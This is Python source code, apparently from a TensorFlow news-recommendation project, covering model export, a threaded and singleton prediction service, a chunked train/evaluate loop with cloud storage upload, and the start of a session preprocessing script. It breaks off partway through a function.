'content_article_embeddings_matrix': content_article_embeddings_matrix
})
return estimator
#Saving the negative samples used to evaluate each session, so that benchmark metrics computed outside the framework (e.g. Matrix Factorization) are comparable
def save_sessions_negative_items(model_output_dir, sessions_negative_items_list, output_file='eval_sessions_negative_samples.json'):
append_lines_to_text_file(os.path.join(model_output_dir, output_file),
map(lambda x: json.dumps({'session_id': x['session_id'],
'negative_items': x['negative_items']}),
sessions_negative_items_list))
def save_sessions_chameleon_recommendations_log(model_output_dir, sessions_chameleon_recommendations_log_list,
eval_hour_id, output_file='eval_chameleon_recommendations_log.json'):
append_lines_to_text_file(os.path.join(model_output_dir, output_file),
map(lambda x: json.dumps({'eval_hour_id': eval_hour_id,
'session_id': x['session_id'],
'next_click_labels': x['next_click_labels'],
'predicted_item_ids': x['predicted_item_ids'],
'predicted_item_probs': x['predicted_item_probs'],
'predicted_item_norm_pop': x['predicted_item_norm_pop']
}),
sessions_chameleon_recommendations_log_list))
#Global vars updated by the Estimator Hook
clicked_items_state = None
eval_sessions_metrics_log = []
sessions_negative_items_log = [] if FLAGS.save_eval_sessions_negative_samples else None
sessions_chameleon_recommendations_log = [] if FLAGS.save_eval_sessions_recommendations else None
global_eval_hour_id = 0
import threading
from queue import Queue
from threading import Thread
#Export model for multithread predict
def export_model(estimator, export_dir):
def _serving_input_receiver_fn():
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
serialized_tf_example = tf.placeholder(dtype=tf.string, shape=None,
name='input_example_tensor')
# the key (e.g. 'examples') should be the same as the input key used when
# building the request for prediction
receiver_tensors = {'examples': serialized_tf_example}
# features = tf.parse_example(serialized_tf_example,session_features_config)
features = parse_sequence_example_predict(serialized_tf_example, session_features_config)[0]
export_input_fn = tf.estimator.export.build_parsing_serving_input_receiver_fn(features)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
estimator.export_saved_model(export_dir,_serving_input_receiver_fn)
# Prediction using session
def get_session(exported_path):
sess = tf.Session()
pickle = ACR_Pickle_Singleton.getInstance()
tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], exported_path)
return sess
class FastClassifierThreaded():
def __init__(self, estimator,
threaded=True,
verbose=False):
"""
Parameters
----------
model_path: str
Location from which to load the model.
threaded: Boolean [True]
Whether to use multi-threaded execution for inference.
If False, the model will use a new generator for each sample that is passed to it, and reload the entire
model each time.
"""
# super(FlowerClassifierThreaded, self).__init__(model_path=model_path,
# verbose=verbose)
self.estimator = estimator
self.verbose = verbose
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
# Kill thread when true
self.killed = False
self.threaded = threaded
if self.threaded:
# Note: the prediction thread is created with daemon=False below, so it will not
# be killed automatically when the main thread exits; it must be stopped explicitly
# via kill_thread() (see https://docs.python.org/3/library/threading.html#threading.Thread.daemon)
# print("ACTIVE NUM THREAD: %d" % (threading.active_count()))
self.prediction_thread = Thread(target=self.predict_from_queue, daemon=False, args=(lambda: self.killed, ))
# print("THREAD NAME: "+self.prediction_thread.getName())
self.prediction_thread.start()
else:
self.predictions = self.estimator.predict(input_fn=lambda: self.queued_predict_input_fn(lambda: self.killed))
# print("FastClassifierThread init success.")
def kill_thread(self):
self.killed = True
def generate_from_queue(self,stop):
""" Generator which yields items from the input queue.
This lives within our 'prediction thread'.
"""
while True:
try:
# print("KILLED: %r" % self.killed)
# print("STOPPED: %r" % stop())
# if self.killed:
# print("REMOVE THREAD")
# break
if stop():
# print("STOP THREAD")
return
yield
if self.verbose:
print('Yielding from input queue')
yield self.input_queue.get()
except Exception as e:
print("Err queue")
print(e)
yield ""
# finally:
# print("Error queue")
# self.input_queue.task_done()
def predict_from_queue(self,stop):
# print("THREAD ID: %d" %threading.current_thread().ident)
""" Adds a prediction from the model to the output_queue.
This lives within our 'prediction thread'.
Note: estimators accept generators as inputs and return generators as output. Here, we are
iterating through the output generator, which will be populated in lock-step with the input
generator.
"""
while not stop():
try:
for i in self.estimator.predict(input_fn=lambda: self.queued_predict_input_fn(stop)):
if self.verbose:
print('Putting in output queue')
self.output_queue.put(i)
print(stop())
print(stop)
if stop():
print("STOP THREAD OUTPUT")
# raise StopIteration
print("OUT FOR LOOP")
break
except Exception as ex:
print("Exception predict_from_queue")
print(ex)
raise
def predict(self, features):
"""
Overwrites .predict in FlowerClassifierBasic.
Calls either the vanilla or multi-threaded prediction methods based upon self.threaded.
Parameters
----------
features: dict
dict of input features, containing keys 'SepalLength'
'SepalWidth'
'PetalLength'
'PetalWidth'
Returns
-------
predictions: dict
Dictionary containing 'probs'
'outputs'
'predicted_class'
"""
try:
# Get predictions dictionary
# print("Into FastClassifierThreaded.predict() ")
# print(self.input_queue.qsize())
# print(self.output_queue.qsize())
if self.threaded:
# features = dict(features)
self.input_queue.put(features)
predictions = self.output_queue.get() # The latest predictions generator
else:
predictions = next(self.predictions)
# predictions = self.estimator.predict(input_fn=lambda: self.predict_input_fn(features))
# print("Prediction in FastClassifierThreaded.Predict() ")
# print(predictions)
# TODO: list vs. generator vs. dict handling
return predictions
except Exception as ex:
print("Exception predict func")
print(ex)
raise
def queued_predict_input_fn(self,stop):
"""
Queued version of a standard `predict_input_fn`.
Instead of yielding a dataset from data as a parameter, we construct a Dataset from a generator,
which yields from the input queue.
"""
if self.verbose:
print("QUEUED INPUT FUNCTION CALLED")
# Fetch the inputs from the input queue
def _inner_input_fn():
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
return prepare_dataset_generator_predict(lambda: self.generate_from_queue(stop), session_features_config, batch_size=1,
truncate_session_length=FLAGS.truncate_session_length, predict_only=True)
return _inner_input_fn()
# tungtv Class Nar Model SingleTon For Predict
class NAR_Model_Predict(object,metaclass=Singleton):
__instance = None
lock = threading.Lock()
def __init__(self):
print("NAR Model Predict init ... ")
pickle = ACR_Pickle_Singleton.getInstance()
model_output_dir =pickle.model_nar_dir
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
self.content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
global clicked_items_state
clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
FLAGS.recent_clicks_buffer_max_size,
FLAGS.recent_clicks_for_normalization,
self.content_article_embeddings_matrix.shape[0])
estimator = build_estimator(model_output_dir,
self.content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
# export_dir = model_output_dir+"exported/"
model_predict_path = model_output_dir + "exported/"
from os import path
if path.exists(model_predict_path):
pass
else:
os.makedirs(model_predict_path)
# create a separate export dir for each worker
import random
from os import path
while True:
num = random.randint(1, 1000)
export_dir = model_predict_path + str(num) + '/'
if not path.exists(export_dir):
break
self.export_dir = export_dir
#Remove old files
# shutil.rmtree(export_dir)
export_model(estimator, self.export_dir)
# Get the latest subfolder created by the model export
model_paths = glob.glob(export_dir+"*")
lastest = sorted(model_paths)[-1]
self.session = get_session(lastest)
#Load tensor for predict
self.load_tensor_from_session(self.session)
self.predict_fn = self.predict_from_expoted_model
#Load internal features
self.load_internal_features()
# print("NAR Model Predict build_estimator done")
#Add FastPred
# self.model = FastClassifierThreaded(estimator, verbose=True)
# print("Model = FastClassifierThread Done")
NAR_Model_Predict.__instance = self
def load_tensor_from_session(self,sess):
#Define output tensor
self.topk = sess.graph.get_tensor_by_name("main/recommendations_ranking/predicted_items/Reshape:0")
self.user_id = sess.graph.get_tensor_by_name("cond/Merge:0")
self.item_clicked = sess.graph.get_tensor_by_name("ExpandDims_5:0")
self.fetches = {"top_k_predictions":self.topk,"user_id":self.user_id,"item_clicked":self.item_clicked}
#Define features
self.examples = sess.graph.get_tensor_by_name("input_example_tensor:0")
self.recent_item_buffer = sess.graph.get_tensor_by_name("articles_status/pop_recent_items_buffer:0")
self.articles_recent_pop_norm = sess.graph.get_tensor_by_name("articles_status/articles_recent_pop_norm:0")
self.content_article_embeddings_matrix_ts = sess.graph.get_tensor_by_name("article_content_embeddings/content_article_embeddings_matrix:0")
# print("shape self.content_article_embeddings_matrix_ts")
# print(self.content_article_embeddings_matrix_ts.get_shape())
# articles_metadata0 = sess.graph.get_tensor_by_name("article_content_embeddings/articles_metadata_0:0")
self.articles_metadata1 = sess.graph.get_tensor_by_name("article_content_embeddings/articles_metadata_1:0")
self.articles_metadata2 = sess.graph.get_tensor_by_name("article_content_embeddings/articles_metadata_2:0")
def load_internal_features(self):
pickle = ACR_Pickle_Singleton.getInstance()
self.articles_features_config = get_articles_features_config(pickle.acr_label_encoders)
self.articles_metadata = process_articles_metadata(pickle.articles_metadata_df, self.articles_features_config)
@staticmethod
def getInstance():
if NAR_Model_Predict.__instance == None:
print("NAR singleton is none")
NAR_Model_Predict()
return NAR_Model_Predict.__instance
def predict_from_expoted_model(self, sess, news_id, guid):
# Get session and parse features from newsid, guid
parsed_example = parse_feature_to_string(news_id,guid)
# Offline local test
# recent_clicks = list(np.random.randint(low=1, high=2800, size=20000))
# recency = clicked_items_state.get_recent_pop_norm_for_predict(recent_clicks)
# Online gg services
# recent_clicks = get_list_id()
# encoded_list_id = []
# count = 0
#convert id to encoded id
pickle = ACR_Pickle_Singleton.getInstance()
# for id in recent_clicks:
# if(int(id) in pickle.acr_label_encoders['article_id']):
# encoded_list_id.append(pickle.get_article_id_encoded(int(id)))
# else:
# count = count +1
encoded_list_id = pickle.encoded_list_id
recency = clicked_items_state.get_recent_pop_norm_for_predict(encoded_list_id)
feed_dict={self.examples:parsed_example,self.recent_item_buffer:recency[1],
self.articles_recent_pop_norm:recency[0],
self.content_article_embeddings_matrix_ts:self.content_article_embeddings_matrix,
# articles_metadata0:articles_metadata['article_id'],
self.articles_metadata1:self.articles_metadata['created_at_ts'],
self.articles_metadata2:self.articles_metadata['category0']}
predictions = sess.run(self.fetches, feed_dict)
return predictions
# predictor = tf.contrib.predictor.from_saved_model(exported_path)
# input_tensor=tf.get_default_graph().get_tensor_by_name("input_example_tensor:0")
# output_dict= predictor({"examples":parsed_example})
# return output_dict
def getUpdateInstance(self):
print("===>NAR MODEL PREDICT UPDATE")
pickle = ACR_Pickle_Singleton.getInstance()
model_output_dir = pickle.model_nar_dir
# print("Model dir: {}".format(model_output_dir))
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
self.content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
# print("matrix: ")
# print(content_article_embeddings_matrix.shape[0])
# print("Shape self")
# print(self.content_article_embeddings_matrix.shape[0])
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
global clicked_items_state
clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
FLAGS.recent_clicks_buffer_max_size,
FLAGS.recent_clicks_for_normalization,
self.content_article_embeddings_matrix.shape[0])
# print("NUM ITEMS CLICKED STATE: ")
# print(clicked_items_state.num_items)
estimator = build_estimator(model_output_dir,
self.content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
# print("Into NAR Model Update")
old_session = self.session
#Remove old files
# shutil.rmtree(export_dir)
for root, dirs, files in os.walk(self.export_dir):
for f in files:
os.unlink(os.path.join(root, f))
for d in dirs:
shutil.rmtree(os.path.join(root, d))
export_model(estimator, self.export_dir)
# Get the latest subfolder created by the model export
model_paths = glob.glob(self.export_dir+"*")
lastest = sorted(model_paths)[-1]
session = get_session(lastest)
self.session = session
# Load tensor for predict
self.load_tensor_from_session(self.session)
self.predict_fn = self.predict_from_expoted_model
#Reload internal features for new session
self.load_internal_features()
#self.content_article_embeddings_matrix = content_article_embeddings_matrix
#Close old session
old_session.close()
print("UPDATE NAR MODEL PREDICT DONE")
# old_model = self.model
# #Add FastPred
# model = FastClassifierThreaded(estimator, verbose=True)
# # print("Start predict first time")
# self.model = model
# # print(model.prediction_thread)
# NAR_Model_Predict.__instance = self
# # Example predict for first time to load graph (avoid lazy load))
# predict("20190918203115156","reloadUser:0")
# # print("ReLoad NAR MODEL Predict done")
# # Kill old thread
# old_model.kill_thread()
# # print("Try to kill")
# dataset_parsed_string = parse_feature_to_string("20190918203115156","deleteUser:0")
# old_model.predict(dataset_parsed_string)
# # print(old_model.prediction_thread)
# try:
# old_model.prediction_thread.join()
# # print("CURRENT THREAD %s STATUS: %r" % (old_model.prediction_thread.getName(),old_model.prediction_thread.is_alive()))
# except Exception as e:
# print(e)
# raise
# # print("REMOVE current thread")
def load_model_for_predict():
pickle = ACR_Pickle_Singleton.getInstance()
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df,pickle.content_article_embeddings_matrix
content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
return articles_features_config, content_article_embeddings_matrix, articles_metadata, session_features_config, acr_label_encoders, articles_metadata_df
#Parse function
from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import numeric_scalers
from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import preprocess_for_predict
def parse_feature_to_string(news_id, guid):
pickle = ACR_Pickle_Singleton.getInstance()
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
def get_article_text_length(article_id):
# article_id is str
# print("articale_id: {}".format(article_id))
# print(articles_metadata_df.dtypes)
if article_id == 0:
return numeric_scalers['text_length']['avg']
articles_metadata_df.set_index('article_id', inplace=False)
# text_length = articles_metadata_df.loc[article_id]['text_length']
text_length = articles_metadata_df[articles_metadata_df['article_id'] == article_id]['text_length'].values[0]
return text_length
dataset_parsed_string = preprocess_for_predict(guid,news_id,get_article_text_length)
return dataset_parsed_string
#Old Prediction function
# def predict(news_id, guid):
# try:
# pickle = ACR_Pickle_Singleton.getInstance()
# acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
# def get_article_text_length(article_id):
# # article_id is str
# # print("articale_id: {}".format(article_id))
# # print(articles_metadata_df.dtypes)
# from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import numeric_scalers
# if article_id == 0:
# return numeric_scalers['text_length']['avg']
# articles_metadata_df.set_index('article_id', inplace=False)
# # text_length = articles_metadata_df.loc[article_id]['text_length']
# text_length = articles_metadata_df[articles_metadata_df['article_id'] == article_id]['text_length'].values[0]
# return text_length
# # print("==================================>content_article_embeddings_matrix.shape[0]")
# # print(content_article_embeddings_matrix.shape[0])
# global clicked_items_state
# # clicked_items_state = ClickedItemsState(1.0,20000, 5000, content_article_embeddings_matrix.shape[0])
# clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
# FLAGS.recent_clicks_buffer_max_size,
# FLAGS.recent_clicks_for_normalization,
# content_article_embeddings_matrix.shape[0])
# clicked_items_state.reset_state()
# # model = get_estimator(model_output_dir, content_article_embeddings_matrix, articles_metadata,
# # articles_features_config, session_features_config)
# model = NAR_Model_Predict.getInstance().model
# from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import preprocess_for_predict
# start = time()
# dataset_parsed_string = preprocess_for_predict(guid,news_id,get_article_text_length)
# end = time()
# # print("PREPROCESS TIME:"+ str(-start+end))
# result = model.predict(dataset_parsed_string)
# # dataset = prepare_data_for_prediction(dataset,session_features_config)
# #a1 = lambda: prepare_data_for_prediction(dataset,session_features_config)
# #iter_pred = model.predict(input_fn=lambda: prepare_data_for_prediction(dataset,session_features_config,truncate_session_length=FLAGS.truncate_session_length))
# #print(iter_pred)
# # for pred_result in iter_pred:
# # print(pred_result)
# #a2 = lambda: prepare_dataset_iterator(training_files_chunk, session_features_config,
# # batch_size=FLAGS.batch_size,
# # truncate_session_length=FLAGS.truncate_session_length,predict_only=True)
# #training_files_chunk="/home/minh/VCC/newsrecomdeepneural/nardata/tmp/test.tfrecord.gz"
# # iter_pred2 = model.predict(input_fn=lambda: prepare_dataset_iterator(dataset_file_name, session_features_config,
# # batch_size=20,
# # truncate_session_length=FLAGS.truncate_session_length,predict_only=True))
# end = time()
# # for pred_result in iter_pred2:
# # print(pred_result)
# # print("COUNTER:")
# print("PREDICT TIME: %f "%(end-start))
# # print("LIST PREDICT:")
# # print(list(iter_pred2))
# # print("Predict success and Return values")
# return result
# except Exception as ex:
# tf.logging.error('ERROR: {}'.format(ex))
# raise
def predict(news_id,guid):
try:
model = NAR_Model_Predict.getInstance()
return model.predict_fn(model.session,news_id,guid)
except Exception as ex:
tf.logging.error('ERROR: {}'.format(ex))
raise
def get_estimator(model_output_dir, content_article_embeddings_matrix, articles_metadata,
articles_features_config, session_features_config):
return build_estimator(model_output_dir,
content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
def main(unused_argv):
try:
# pickle = ACR_Pickle_Singleton.getInstance()
# model_output_dir =pickle.model_nar_dir
# acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
# content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
# articles_features_config = get_articles_features_config(acr_label_encoders)
# articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
# nar_label_encoders = \
# NAR_Pickle_Singleton.getInstance()
# session_features_config = get_session_features_config(nar_label_encoders)
# global clicked_items_state
# clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
# FLAGS.recent_clicks_buffer_max_size,
# FLAGS.recent_clicks_for_normalization,
# content_article_embeddings_matrix.shape[0])
# clicked_items_state.reset_state()
# estimator = build_estimator(model_output_dir,
# content_article_embeddings_matrix, articles_metadata, articles_features_config,
# session_features_config)
# Old Pred, using threaded queue
print(predict("20190926084500472","2265891616712405988"))
# New Pred, export model -> using model to predict
# export_path = "/home/minh/VCC/newsrecomdeepneural/nardata/exported/serving"
# export_model(estimator, export_path)
# export_path = "/home/minh/VCC/newsrecomdeepneural/nardata/exported/serving/1571386208"
# a = predict_from_expoted_model("20190926084500472","ahuhu",export_path)
# print(a)
# start_time = time()
# a = predict("20190926084500472","2265891616712405988")
# end_time = time()
# print("COUNTER FULL: "+ str(-start_time+end_time))
# for i in range(5):
# print(i)
# print("-"*i)
# print(predict("20190926084500472","2265891616712405988"+str(i)))
# print("PRELOAD: "+ str(-end_time+time()))
# Capture whether it will be a single training job or a hyper parameter tuning job.
tf_config_env = json.loads(os.environ.get('TF_CONFIG', '{}'))
task_data = tf_config_env.get('task') or {'type': 'master', 'index': 0}
trial = task_data.get('trial')
running_on_mlengine = (len(tf_config_env) > 0)
print('Running {}'.format('on Google ML Engine' if running_on_mlengine else 'on a server/machine'))
#Disabling duplicate logs on console when running locally
logging.getLogger('tensorflow').propagate = running_on_mlengine
tf.logging.info('Starting training job')
gcs_model_output_dir = FLAGS.model_dir
#If model output must be persisted and loaded from a local cache (to speed up in ML Engine)
if FLAGS.use_local_cache_model_dir:
model_output_dir = tempfile.mkdtemp()
tf.logging.info('Created local temp folder for models output: {}'.format(model_output_dir))
else:
model_output_dir = gcs_model_output_dir
if trial is not None:
model_output_dir = os.path.join(model_output_dir, trial)
gcs_model_output_dir = os.path.join(gcs_model_output_dir, trial)
tf.logging.info(
"Hyperparameter Tuning - Trial {} - model_dir = {} - gcs_model_output_dir = {} ".format(trial, model_output_dir, gcs_model_output_dir))
tf.logging.info('Will save temporary model outputs to {}'.format(model_output_dir))
#If should warm start training from other previously trained model
if FLAGS.warmup_model_dir != None:
tf.logging.info('Copying model outputs from previous job ({}) for warm start'.format(FLAGS.warmup_model_dir))
dowload_model_output_from_gcs(model_output_dir,
gcs_model_dir=FLAGS.warmup_model_dir,
files_pattern=['graph.pb',
'model.ckpt-',
'checkpoint'])
local_files_after_download_to_debug = list(glob.iglob("{}/**/*".format(model_output_dir), recursive=True))
tf.logging.info('Files copied from GCS to warm start training: {}'.format(local_files_after_download_to_debug))
tf.logging.info('Loading ACR module assets')
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = \
load_acr_module_resources(FLAGS.acr_module_resources_path)
#Min-max scaling of the ACR embedding for a compatible range with other input features for NAR module
content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1,0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
tf.logging.info('Loading NAR module preprocessing assets')
nar_label_encoders=load_nar_module_preprocessing_resources(FLAGS.nar_module_preprocessing_resources_path)
session_features_config = get_session_features_config(nar_label_encoders)
tf.logging.info('Building NAR model')
global eval_sessions_metrics_log, sessions_negative_items_log, sessions_chameleon_recommendations_log, global_eval_hour_id
eval_sessions_metrics_log = []
clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
FLAGS.recent_clicks_buffer_max_size,
FLAGS.recent_clicks_for_normalization,
content_article_embeddings_matrix.shape[0])
model = build_estimator(model_output_dir,
content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
tf.logging.info('Getting training file names')
train_files = resolve_files(FLAGS.train_set_path_regex)
if FLAGS.train_files_from > FLAGS.train_files_up_to:
raise Exception('Final training file cannot be lower than Starting training file')
train_files = train_files[FLAGS.train_files_from:FLAGS.train_files_up_to+1]
tf.logging.info('{} files on which the network will be trained and evaluated, from {} to {}' \
.format(len(train_files), train_files[0], train_files[-1]))
start_train = time()
tf.logging.info("Starting Training Loop")
training_files_chunks = list(chunks(train_files, FLAGS.training_hours_for_each_eval))
cur_time = time()
all_time = []
for chunk_id in range(0, len(training_files_chunks)-1):
training_files_chunk = training_files_chunks[chunk_id]
tf.logging.info('Training files from {} to {}'.format(training_files_chunk[0], training_files_chunk[-1]))
if FLAGS.prediction_only:
iter_pred = model.predict(input_fn=lambda: prepare_dataset_iterator(training_files_chunk, session_features_config,
batch_size=FLAGS.batch_size,
truncate_session_length=FLAGS.truncate_session_length,predict_only=True))
for pred_result in iter_pred:
pred_time = time()
dt =pred_time-cur_time
all_time.append(dt)
cur_time = pred_time
continue
model.train(input_fn=lambda: prepare_dataset_iterator(training_files_chunk, session_features_config,
batch_size=FLAGS.batch_size,
truncate_session_length=FLAGS.truncate_session_length))
if chunk_id < len(training_files_chunks)-1:
#Using the first hour of the next training chunk as eval
eval_file = training_files_chunks[chunk_id+1][0]
tf.logging.info('Evaluating file {}'.format(eval_file))
model.evaluate(input_fn=lambda: prepare_dataset_iterator(eval_file, session_features_config,
batch_size=FLAGS.batch_size,
truncate_session_length=FLAGS.truncate_session_length))
#After each number of train/eval loops
if chunk_id % FLAGS.save_results_each_n_evals == 0:
tf.logging.info('Saving eval metrics')
global_eval_hour_id += 1
save_eval_benchmark_metrics_csv(eval_sessions_metrics_log, model_output_dir,
training_hours_for_each_eval=FLAGS.training_hours_for_each_eval)
if FLAGS.save_eval_sessions_negative_samples:
#Flushing to disk the negative samples used to evaluate each session,
#so that benchmark metrics computed outside the framework (e.g. Matrix Factorization) are comparable
save_sessions_negative_items(model_output_dir, sessions_negative_items_log)
sessions_negative_items_log = []
if FLAGS.save_eval_sessions_recommendations:
#Flushing to disk the recommended items to test re-ranking approaches (e.g. MMR)
save_sessions_chameleon_recommendations_log(model_output_dir,
sessions_chameleon_recommendations_log, global_eval_hour_id)
sessions_chameleon_recommendations_log = []
#Incrementing the eval hour id
global_eval_hour_id += 1
#If model output must be persisted and loaded from a local cache (to speed up in ML Engine)
if FLAGS.use_local_cache_model_dir:
tf.logging.info('Uploading cached results to GCS')
upload_model_output_to_gcs(model_output_dir, gcs_model_dir=gcs_model_output_dir,
#files_pattern=None)
files_pattern=[#'events.out.tfevents.',
'.csv', '.json'])
all_time = np.array(all_time, dtype=np.float)
print("Min %f s, max %f s, avg %f s" % (np.min(all_time), np.max(all_time), np.average(all_time)))
print(all_time)
tf.logging.info('Finalized Training')
if not FLAGS.prediction_only:
save_eval_benchmark_metrics_csv(eval_sessions_metrics_log, model_output_dir,
training_hours_for_each_eval=FLAGS.training_hours_for_each_eval)
if FLAGS.save_eval_sessions_negative_samples:
#Flushing to disk the negative samples used to evaluate each session,
#so that benchmark metrics computed outside the framework (e.g. Matrix Factorization) are comparable
save_sessions_negative_items(model_output_dir, sessions_negative_items_log)
if FLAGS.save_eval_sessions_recommendations:
#Flushing to disk the recommended items to test re-ranking approaches (e.g. MMR)
save_sessions_chameleon_recommendations_log(model_output_dir, sessions_chameleon_recommendations_log, global_eval_hour_id)
tf.logging.info('Saved eval metrics')
#If model output must be persisted and loaded from a local cache (to speed up in ML Engine)
if FLAGS.use_local_cache_model_dir:
#Uploads all files to GCS
upload_model_output_to_gcs(model_output_dir, gcs_model_dir=gcs_model_output_dir,
files_pattern=None)
log_elapsed_time(start_train, 'Finalized TRAINING Loop')
except Exception as ex:
tf.logging.error('ERROR: {}'.format(ex))
raise
if __name__ == '__main__':
tf.app.run()
```
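The main() loop above implements a streaming protocol: train on a chunk of N hourly session files, then evaluate on the first hour of the next chunk. The standalone sketch below re-creates only that scheduling logic in plain Python for clarity; chunks() is re-implemented locally as a stand-in for the helper imported from nar/utils.py, and the file names and chunk size are made up.

```python
def chunks(lst, n):
    # Yield successive n-sized chunks from lst (local stand-in for the utils helper).
    for i in range(0, len(lst), n):
        yield lst[i:i + n]

hourly_files = ["sessions_hour_{:04d}.tfrecord".format(h) for h in range(12)]
training_hours_for_each_eval = 5  # mirrors the FLAGS value, illustrative only

file_chunks = list(chunks(hourly_files, training_hours_for_each_eval))
for chunk_id in range(len(file_chunks) - 1):
    train_files = file_chunks[chunk_id]
    eval_file = file_chunks[chunk_id + 1][0]  # first hour of the next chunk
    print("train on", train_files, "-> evaluate on", eval_file)
```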
#### File: nar/preprocessing/nar_preprocess_cafebiz_2.py
```python
import argparse
import glob
import json
import os
import os.path
import re
import sys
from collections import Counter, defaultdict
from datetime import datetime
from os import path
import numpy as np
import pandas as pd
import tensorflow as tf
from acr_module.acr.acr_module_service import get_all_file, load_json_config
from nar_module.nar.tf_records_management import (make_sequential_feature,
save_rows_to_tf_record_file)
from nar_module.nar.utils import (deserialize, extract_local_hour_weekday,
gini_index, serialize)
# sys.path.append("/home/tungtv/Documents/Code/News/newsrecomdeepneural")
from pick_singleton.pick_singleton import ACR_Pickle_Singleton
from redis_connector.RedisClient import PageView, RedisClient, Session
sys.path.append("/data/tungtv/Code/NewsRecomDeepLearning")
# from ..tf_records_management import save_rows_to_tf_record_file, make_sequential_feature
# from ..utils import serialize, deserialize, hash_str_to_int, extract_local_hour_weekday, gini_index
def create_args_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'--input_sessions_json_folder_path', default='',
help='Input path of the folder with sessions in JSON lines file, organized by hour (exported by the Spark script - nar_preprocessing_addressa_01_dataproc.ipynb).')
parser.add_argument(
'--input_acr_metadata_embeddings_path', default='',
help='Input path for a pickle with articles metadata and content embeddings, generated by ACR module.')
parser.add_argument(
'--input_nar_encoders_dict_path', default='',
help='Input path for a pickle with the dictionary encoders for categorical features (exported by the Spark script - nar_preprocessing_addressa_01_dataproc.ipynb)')
parser.add_argument(
'--number_hours_to_preprocess', type=int, default=-1,
help='Number of hours to preprocess')
parser.add_argument(
'--output_nar_preprocessing_resources_path', default='',
help='Output path for a pickle with label encoders and num scalers of clicks data.')
parser.add_argument(
'--output_sessions_tfrecords_path', default='',
help='Output path for TFRecords generated with user sessions')
return parser
def load_acr_module_resources(acr_module_resources_path):
(acr_label_encoders, articles_metadata_df, content_article_embeddings) = \
deserialize(acr_module_resources_path)
articles_metadata_df.set_index('article_id', inplace=False)
# articles_metadata_df.index = articles_metadata_df.index.astype(str)
def get_article_text_length(article_id):
# article_id is str
# print("articale_id: {}".format(article_id))
# text_length = articles_metadata_df.loc[article_id]['text_length']
if article_id == 0:
return numeric_scalers['text_length']['avg']
text_length = articles_metadata_df[articles_metadata_df['article_id'] == article_id]['text_length'].values[0]
# print("text_length")
# print(text_length)
return text_length
def get_article_id_encoded(article_id):
return acr_label_encoders['article_id'][article_id]
#tf.logging.info("Read ACR label encoders for: {}".format(acr_label_encoders.keys()))
#article_id_label_encoder = acr_label_encoders['article_id']
return get_article_text_length, get_article_id_encoded
def load_nar_module_resources(nar_encoders_dict_path):
nar_encoders_dict = \
deserialize(nar_encoders_dict_path)
print("Read NAR label encoders dict for: {}".format(nar_encoders_dict.keys()))
return nar_encoders_dict
def load_sessions_json_file(json_path):
with open(json_path, 'r') as fi:
for line in fi:
yield json.loads(line)
def load_sessions_hour(session_hour_path):
sessions = []
for session_file in os.listdir(session_hour_path):
session_file_path = os.path.join(session_hour_path, session_file)
sessions_hour = load_sessions_json_file(session_file_path)
for session in sessions_hour:
sessions.append(session)
return sessions
def load_sessions_hours(folder_path):
#Sorting hour directories numerically, so that e.g. "session_hour=3" sorts before "session_hour=20"
hour_folders = sorted([path for path in os.listdir(folder_path) \
if os.path.isdir(os.path.join(folder_path,path))],
